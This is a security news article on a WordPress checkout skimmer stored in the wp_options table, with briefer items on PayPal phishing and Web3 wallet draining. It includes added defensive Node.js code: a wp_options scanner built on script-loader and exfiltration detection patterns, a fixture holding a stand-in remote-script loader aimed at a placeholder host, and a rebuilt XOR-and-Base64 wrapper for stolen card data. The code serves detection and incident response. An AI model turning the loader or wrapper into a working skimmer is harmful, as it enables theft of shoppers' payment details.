
WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables

By The Hacker News
January 18, 2025


Cybersecurity researchers are warning of a new stealthy credit card skimmer campaign that targets WordPress e-commerce checkout pages by inserting malicious JavaScript code into a database table associated with the content management system (CMS).

“This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database entries to steal sensitive payment details,” Sucuri researcher Puja Srivastava said in a new analysis.

“The malware activates specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form.”

The GoDaddy-owned website security company said it discovered the malware embedded in the WordPress wp_options table under the option name “widget_block”. Because the code lives in the database rather than in theme or plugin files, it avoids detection by file-level scanning tools and persists on compromised sites without attracting attention.


The attacker places the malicious JavaScript in a custom HTML block widget through the WordPress admin panel (wp-admin > Widgets); WordPress then stores the widget’s contents in the wp_options table, not on disk.
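The check a responder wants for this persistence location is a scan of the wp_options rows themselves, since a file scanner never looks there. The following is an added example written for this page (Node.js), not code from the Sucuri report or from WordPress core: it flags any widget option that carries an inline script, or any option matching two or more loader/exfiltration indicators. The rows are constructed sample data, the serialization helper only approximates how WordPress stores block widgets, and the flagged widget is a stand-in loader pointing at example.invalid, not the real skimmer.

```javascript
// Added example (not from the Sucuri report or WordPress core): scan exported wp_options
// rows for inline <script> payloads hidden in block widgets. Sample rows are constructed;
// the flagged widget is a stand-in loader pointing at example.invalid, not the real skimmer.

// Indicators worth flagging inside option values. "inline-script" alone is enough to flag a
// widget row, since a legitimate block widget rarely needs executable JavaScript.
const SUSPICIOUS_PATTERNS = [
  { name: 'inline-script',   re: /<script\b/i },
  { name: 'checkout-check',  re: /checkout/i },
  { name: 'string-decoding', re: /\b(atob|fromCharCode|unescape)\s*\(/ },
  { name: 'dynamic-loader',  re: /document\.createElement\s*\(\s*['"]script['"]/i },
  { name: 'external-post',   re: /\b(fetch|XMLHttpRequest|sendBeacon)\b/ },
];

// WordPress keeps widget contents under option names prefixed "widget_"; block widgets
// (the kind abused here) live in the single "widget_block" row.
const WIDGET_OPTION_RE = /^widget_/;

// Approximates how WordPress serializes block widgets (PHP serialize() format, string
// lengths in bytes, widget ids starting at 2). Used only to build realistic sample rows.
function phpSerializeBlockWidgets(contents) {
  const entries = contents.map((c, i) => {
    const len = Buffer.byteLength(c, 'utf8');
    return `i:${i + 2};a:1:{s:7:"content";s:${len}:"${c}";}`;
  }).join('');
  return `a:${contents.length + 1}:{${entries}s:12:"_multiwidget";i:1;}`;
}

function scanOption(row) {
  const hits = SUSPICIOUS_PATTERNS
    .filter(p => p.re.test(row.option_value))
    .map(p => p.name);
  return {
    option_name: row.option_name,
    is_widget: WIDGET_OPTION_RE.test(row.option_name),
    hits,
  };
}

// Returns the rows a responder should look at: any option carrying an inline <script>,
// or any option matching two or more loader/exfiltration indicators.
function scanWpOptions(rows) {
  return rows
    .map(scanOption)
    .filter(r => r.hits.includes('inline-script') || r.hits.length >= 2);
}

// Constructed sample export of wp_options (option_name, option_value).
const SAMPLE_ROWS = [
  { option_name: 'siteurl',  option_value: 'https://shop.example' },
  { option_name: 'blogname', option_value: 'Example Shop' },
  { option_name: 'widget_block',
    option_value: phpSerializeBlockWidgets([
      '<p>Free shipping on orders over $50</p>',   // benign widget
      '<script>if(location.pathname.includes("checkout")){' +
      'var s=document.createElement("script");' +
      's.src=atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=");' +   // "https://example.invalid"
      'document.head.appendChild(s)}</script>',   // stand-in loader hidden in a widget
    ]) },
];

const FINDINGS = scanWpOptions(SAMPLE_ROWS);
for (const finding of FINDINGS) {
  console.log(`${finding.option_name}: ${finding.hits.join(', ')}`);
}
```

The equivalent one-off check against a live site is a query such as `SELECT option_name FROM wp_options WHERE option_value LIKE '%<script%';`, or `wp option get widget_block` with WP-CLI; either covers the database location a file scanner misses.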

The JavaScript checks whether the current page is a checkout page and only springs into action once the visitor is about to enter payment details, at which point it dynamically creates a bogus payment form that mimics legitimate payment processors such as Stripe.

The form is designed to capture users’ credit card numbers, expiration dates, CVV numbers, and billing information. Alternatively, the rogue script can capture data entered into legitimate payment fields in real time, which maximizes its compatibility with different checkout implementations.

The stolen data is then encrypted with AES-CBC and Base64-encoded so that the outgoing request looks innocuous and resists analysis. In the final stage it is transmitted to an attacker-controlled server (“valhafather[.]xyz” or “fqbe23[.]xyz”).

The development comes more than a month after Sucuri highlighted a similar campaign that leveraged JavaScript malware to dynamically create fake credit card forms or extract data entered in payment fields on checkout pages.

The harvested information is then wrapped in three layers of obfuscation: it is serialized as JSON, XOR-encrypted with the key “script”, and finally Base64-encoded before exfiltration to a remote server (“staticfonts[.]com”).

“The script is designed to extract sensitive credit card information from specific fields on the checkout page,” Srivastava noted. “Then the malware collects additional user data through Magento’s APIs, including the user’s name, address, email, phone number, and other billing information. This data is retrieved via Magento’s customer-data and quote models.”
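The three layers described for the staticfonts[.]com campaign are cheap to reverse once the key is known, and a repeating-key XOR also leaks its key wherever the plaintext is predictable. The following is an added example written for this page (Node.js), not code from the Sucuri analysis: it reconstructs the wrapping only to produce realistic input, then shows the decoder a responder would use on a captured exfiltration body and a known-plaintext key recovery. It assumes the XOR is a repeating-key XOR over the UTF-8 bytes of the JSON; the sample record is constructed and uses a well-known test card number.

```javascript
// Added example, not code from the Sucuri analysis: the three wrapping layers described
// for the staticfonts[.]com campaign (JSON -> XOR with key "script" -> Base64), plus the
// decoder and key recovery a responder needs. Assumption: repeating-key XOR over UTF-8 bytes.

const XOR_KEY = 'script';

function xorBytes(bytes, key) {
  const k = Buffer.from(key, 'utf8');
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ k[i % k.length];
  return out;
}

// Attacker side, reconstructed only to produce realistic input for the decoder.
function wrapExfil(record, key = XOR_KEY) {
  const json = Buffer.from(JSON.stringify(record), 'utf8');
  return xorBytes(json, key).toString('base64');
}

// Responder side: peel Base64, XOR and JSON in reverse. Returns null when the key is wrong,
// the normal failure mode when a variant of the skimmer rotates the key.
function unwrapExfil(payload, key = XOR_KEY) {
  try {
    const text = xorBytes(Buffer.from(payload, 'base64'), key).toString('utf8');
    return JSON.parse(text);
  } catch {
    return null;
  }
}

// XOR leaks the key wherever the plaintext is known: a JSON object always starts with '{"',
// so the first two key bytes fall out directly. Extending knownPlaintext with the first
// field name (e.g. '{"cc_number"') recovers a short key in full.
function recoverKeyPrefix(payload, knownPlaintext = '{"') {
  const raw = Buffer.from(payload, 'base64');
  const kp = Buffer.from(knownPlaintext, 'utf8');
  const keyBytes = [];
  for (let i = 0; i < kp.length && i < raw.length; i++) keyBytes.push(kp[i] ^ raw[i]);
  return Buffer.from(keyBytes).toString('utf8');
}

// Constructed sample: what the skimmer would collect from a checkout form (test card number).
const SAMPLE_RECORD = { cc_number: '4111111111111111', expiry: '12/27', cvv: '123', name: 'J. Doe' };
const SAMPLE_PAYLOAD = wrapExfil(SAMPLE_RECORD);

console.log('exfil body :', SAMPLE_PAYLOAD);
console.log('decoded    :', unwrapExfil(SAMPLE_PAYLOAD));
console.log('key prefix :', recoverKeyPrefix(SAMPLE_PAYLOAD, '{"cc_number"'));
```

The key-recovery step is the practical point: a Base64 blob in a POST body that decodes to high-entropy bytes but XORs against `{"` into printable characters is a strong sign of exactly this kind of wrapping, and the field names recovered that way confirm what was taken.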

The disclosure also follows the discovery of a financially-motivated phishing email campaign that tricks recipients into clicking on PayPal login pages under the guise of an outstanding payment request to the tune of nearly $2,200.

“The scammer appears to have simply registered a Microsoft 365 test domain, which is free for three months, and then created a distribution list (Billingdepartments1[@]gkjyryfjy876.onmicrosoft.com) containing victim emails,” Fortinet FortiGuard Labs’ Carl Windsor said. “On the PayPal web portal, they simply request the money and add the distribution list as the address.”

What makes the campaign sneaky is that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a genuine sign-in URL, which lets the emails slip past security tools.

To make matters worse, as soon as the victim logs in to their PayPal account to look into the payment request, the account is automatically linked to the email address of the distribution list, allowing the threat actor to hijack control of it.

In recent weeks, malicious actors have also been observed leveraging a novel technique called transaction simulation spoofing to steal cryptocurrency from victim wallets.


“Modern Web3 wallets incorporate transaction simulation as a user-friendly feature,” Scam Sniffer said. “This capability allows users to preview the expected outcome of their transactions before signing them. While designed to enhance transparency and user experience, attackers have found ways to exploit this mechanism.”


The infection chains involve taking advantage of the time gap between transaction simulation and execution, permitting attackers to set up fake sites mimicking decentralized apps (DApps) in order to carry out fraudulent wallet draining attacks.

“This new attack vector represents a significant evolution in phishing techniques,” the Web3 anti-scam solution provider said. “Rather than relying on simple deception, attackers are now exploiting trusted wallet features that users rely on for security. This sophisticated approach makes detection particularly challenging.”
